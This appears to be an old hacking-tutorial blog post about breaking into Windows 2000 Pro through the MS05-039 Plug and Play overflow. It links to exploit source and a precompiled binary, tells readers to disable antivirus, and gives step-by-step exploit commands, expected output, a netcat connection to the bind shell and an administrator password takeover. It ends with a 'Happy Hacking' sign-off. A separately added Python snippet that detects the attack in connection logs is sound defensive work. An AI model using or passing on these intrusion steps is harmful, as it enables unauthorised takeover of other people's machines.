This hack is very old, by the way, but it is good training and gives you a feel for what a penetration looks like :-) Hacking Windows 2000 Professional with the MS05-039 Vulnerability – Microsoft Windows Plug and Play Remote Service Overflow.

First Story:
Around August 2005, Microsoft announced a hole / vulnerability in their operating system that affects Windows 2000 Pro and is considered “High Risk”. Have a look at Microsoft.com and search for the MS05-039 bug / vulnerability, Microsoft Windows Plug and Play Remote Service Overflow. This bug was also used by the Zotob virus and its variants, which were famous at that time, so Microsoft immediately urged users of their products, especially Windows 2000 Pro, to update/patch their operating system. This hole may also be exploitable on other Microsoft products, like Windows XP, 2003, or Windows Server 2000. But in my experience, the biggest vulnerability is on Windows 2000 Pro, even with SP4 (Service Pack 4).

Tools for Hacking Action:
Here I will teach you how to hack/penetrate a PC running the Windows 2000 operating system. Of course we need tools to carry out such an attack, so let’s prepare them:
1. Exploit -> Download the source at http://www.milw0rm.com/id.php?id=1149, or download my hack2pro.rar at http://rapidshare.com/files/250676508/hack2kpro.rar, which includes the compiled, executable exploit.
2. A PC with Windows 2000, Windows XP or Linux, connected to the same network as the target.
3. A C compiler to compile the exploit –> For Windows, you can use LCC; on Linux, of course, use GCC. You can also download it here –> http://rapidshare.com/files/250679635/LCC.rar
4. Download and install netcat for Windows. On Linux it is already available out of the box, which is why I love Linux so much. For Windows, you can download it here: http://rapidshare.com/files/250678252/Windows-netcat.rar

Now follow these steps to hack / penetrate Windows 2000 Pro:
1. Download the exploit and compile it (you can skip this step if you downloaded the compiled, executable exploit)
- For Linux: [root@it-hacked]# gcc -o exploit source_exploit_file.c

- For Windows: Using LCC, just open your source_exploit_file.c and then choose the Compile menu (DO NOT FORGET TO TURN OFF YOUR ANTI VIRUS SYSTEM). The compile result will be an .exe file.

2. After it has compiled successfully, you can run the file:
- In Windows: C:\exploit.exe [IP Target] [Port Number]
- In Linux: [root@it-hacked]# ./exploit [IP Target] [Port Number]

Example:
- In Windows: C:\exploit.exe 192.168.1.100 8888
- In Linux: [root@it-hacked]# ./exploit 192.168.1.100 8888

3. When the exploit runs, the output will look something like:
[*] connecting to 192.168.1.100:445…ok
[*] null session…ok
[*] bind pipe…ok
[*] sending crafted packet…ok
[*] check your shell on 192.168.1.100:8888

Press Ctrl + C to halt the exploit program.

4. Run netcat:
- In Windows: C:\nc 192.168.1.100 8888
- In Linux: netcat 192.168.1.100 8888

5. If it succeeds, we get a root shell on that Windows 2000 Pro machine.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
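
As an added, defender-side example that is not part of the original post: the sequence above (a connection to the target’s port 445, then a shell on the high port the exploit chose, here 8888) is also what the attack looks like in connection logs. The Python below walks constructed firewall-style log lines (assumed format: timestamp, source, destination, port, verdict) and flags a source that hits port 445 and then opens a high, non-SMB port on the same destination within a short window.

```python
import re

# Constructed sample connection log (not from the original post): one
# "timestamp src dst dport verdict" record per line, epoch seconds.
SAMPLE_LOG = """\
1123851600 192.168.1.50 192.168.1.100 445 accept
1123851601 192.168.1.50 192.168.1.100 445 accept
1123851604 192.168.1.50 192.168.1.100 8888 accept
1123851700 192.168.1.20 192.168.1.100 445 accept
1123851730 192.168.1.20 192.168.1.100 139 accept
1123852000 192.168.1.77 192.168.1.100 445 accept
1123855000 192.168.1.77 192.168.1.100 8888 accept
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\w+)$")

# Ports a client may legitimately reach right after SMB (NetBIOS, RPC).
KNOWN_SMB_NEIGHBOURS = {135, 137, 138, 139, 445}
WINDOW_SECONDS = 60  # assumed: how soon after 445 the high port must open


def parse_log(text):
    """Parse log text into (ts, src, dst, dport) tuples, skipping bad lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group(5) == "accept":
            events.append((int(m.group(1)), m.group(2), m.group(3), int(m.group(4))))
    return events


def find_bind_shell_followups(events, window=WINDOW_SECONDS):
    """Return (src, dst, port) where src reached dst:445 and then, within
    `window` seconds, opened a high non-SMB port on the same dst: the
    shape of the exploit's "check your shell on <target>:<port>" step."""
    last_445 = {}
    hits = []
    for ts, src, dst, dport in sorted(events):
        key = (src, dst)
        if dport == 445:
            last_445[key] = ts
        elif dport >= 1024 and dport not in KNOWN_SMB_NEIGHBOURS:
            t0 = last_445.get(key)
            if t0 is not None and 0 <= ts - t0 <= window:
                hits.append((src, dst, dport))
    return hits


if __name__ == "__main__":
    for src, dst, port in find_bind_shell_followups(parse_log(SAMPLE_LOG)):
        print(f"ALERT: {src} -> {dst}:445 then {dst}:{port} within {WINDOW_SECONDS}s")
```

Only the first source is flagged: the second touches a normal SMB neighbour port, and the third opens 8888 far outside the window.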

After that, it’s up to you what you want to do. Or leave me a comment if you wish me to post what we can do afterwards :-) That is for future posts, if you want them!!

P.S.: The first thing we might want to do is change the “administrator password”, hehehe. It’s easy from the command line: just run “net user administrator *” (without quotes) and it will prompt you to type a new password even if you lost or forgot the old one; it doesn’t ask anything about the old password :-)

Have fun, Happy Hacking
